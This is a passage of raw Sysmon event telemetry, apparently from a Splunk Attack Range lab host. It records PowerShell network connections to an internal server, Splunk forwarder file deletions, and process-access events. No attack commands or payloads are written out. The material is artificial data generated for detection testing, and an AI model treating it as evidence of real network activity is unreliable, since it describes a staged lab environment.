21:53:53.014{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62022-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127398Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:29.317{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC4ADBFF453A6B1EF5B8A0CC21F0CDC6,SHA256=F9B7CFEDD2C0D67D0ACBD3EC9159B382667C7C34F94A3D86D647A39547DA7CD8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127400Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:30.331{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2C6D919FEE5A32F0FA7134224E24913,SHA256=64C342C32C6110AA974B243700E16018E1CC8E6C658AEEFF6246954749CABEB1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127399Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:54.281{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62023-false10.0.1.12-8000- 23542300x800000000000000035127401Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:31.346{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3422138C6F0E7C2DD1EF9780A05A60AA,SHA256=107AC267A6BF331FA9982F678ABA772A17675332116FCC601BAE407A59EECE01,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127403Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:32.779{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF724b68df.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127402Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:32.360{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C4B0793037D874ACCB140385578C246,SHA256=3EC6686FCDF96944AAAD69A2B4DCD672B059CF79C664F1A2F25CC53C7ED70CC4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127405Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:33.877{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=53A802B05CFB4652E09D94295C87F8EC,SHA256=D72B5BDAB7B785B3AD51669B1D06ECCF036D540008EA80A9445029B3A0148E70,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127404Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:33.381{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EB9BF22E9C10833F70C09F41C6AC4B6,SHA256=F6EA047C1E2B563403D62624DD13D8AFF225AC55BF5497C1D4D856CE861AA6F4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127407Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:59.023{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62024-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127406Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:34.395{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A85F2E75FD7ABE1E4B4BCC2C50B897E,SHA256=CBCD5D5966A24714D3A160448D3510B75D2ADB7B94C15DC035B136842E114BAC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127409Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:59.353{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62025-false10.0.1.12-8000- 23542300x800000000000000035127408Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:35.426{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77C72F16AD194EFC6C98C89DB947F0D6,SHA256=955F61C21FF5AC11DB91D93EE6BC68CF9278485D46BA0C628614CF57EDED1053,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127410Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:36.440{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03212A88A906AA0B2DD396C1AD66C2C6,SHA256=02EA128BB8014785D342CFE6981BCA0FC58E2004D1CC6651A74C87B40DA3842C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127412Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:37.971{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=C57B27ED1EAF14DC120057A6F881EAEC,SHA256=7DFFE7FADFD7539A5E3233F25DCBFAAC9204711F6B3ACD22B6BAF880757E27C8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127411Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:37.473{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F57A2965500428838258669F472BE6A4,SHA256=FA5F806A6DD4AC303904F10975FFB0F63B820BA1736459016E15F62417D4E6BD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127413Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:38.523{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B5EC2E31939C815046F4AB0B00AB444,SHA256=896323BDCFEB9D04034261DD2E6F34D1B6F823BF9D64A40491C1485D2C74EFF2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127415Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:39.873{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=699CB9BB3740ED07DE305CA6CFA84C74,SHA256=8839A2CA9DF9E7DD3E1BE57A83D5756B80340386CB47617EEB3309E87730E230,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127414Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:39.571{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0CA267134D637203D13E84C68ACB92A,SHA256=2A66E3686E1963B6137646ABB54BFD33BDE7BEB871093C90DAC60BB927A3935F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127426Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:40.874{B81B27B7-8264-613A-AC96-03000000C801}67965512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127425Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:40.721{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8264-613A-AC96-03000000C801}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127424Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:40.721{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127423Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:40.721{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127422Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:40.721{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127421Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:40.721{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127420Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:40.721{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-8264-613A-AC96-03000000C801}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127419Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:40.721{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8264-613A-AC96-03000000C801}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127418Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:40.707{B81B27B7-8264-613A-AC96-03000000C801}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035127417Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:05.033{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62026-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127416Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:40.590{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=502FF915B695907A549C65723E6F1820,SHA256=9CAC1B24A9DA82573937A4F55171810D62AC1093758390C9ADE59389140A54F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127439Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:41.721{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ECBD53B347C436AEA30F3BB66761BDF6,SHA256=D25D1458CEC4114D153F8A14963C3B471FF52AE73B6FBA7DB99DC3B535C6150B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127438Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:41.721{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6B22C980D277A5AB7B34DD59AAE82C87,SHA256=0419D6A591EA7582BE8A02146788C772E3F99DD88DCE97DAE7DBB7F8875EAF3D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127437Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:41.605{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD0CB10B1934E796831A9E15178590BF,SHA256=A7EC9B9B1D96EB04DEE88DC389FEA5BE7E8B1417DADC03ED7B5CF87EA7297AC3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127436Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:41.574{B81B27B7-8265-613A-AD96-03000000C801}5280932C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035127435Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:05.370{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62027-false10.0.1.12-8000- 10341000x800000000000000035127434Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:41.421{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8265-613A-AD96-03000000C801}5280C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127433Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:41.421{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127432Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:41.421{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127431Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:41.421{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127430Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:41.421{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127429Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:41.421{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-8265-613A-AD96-03000000C801}5280C:\Program 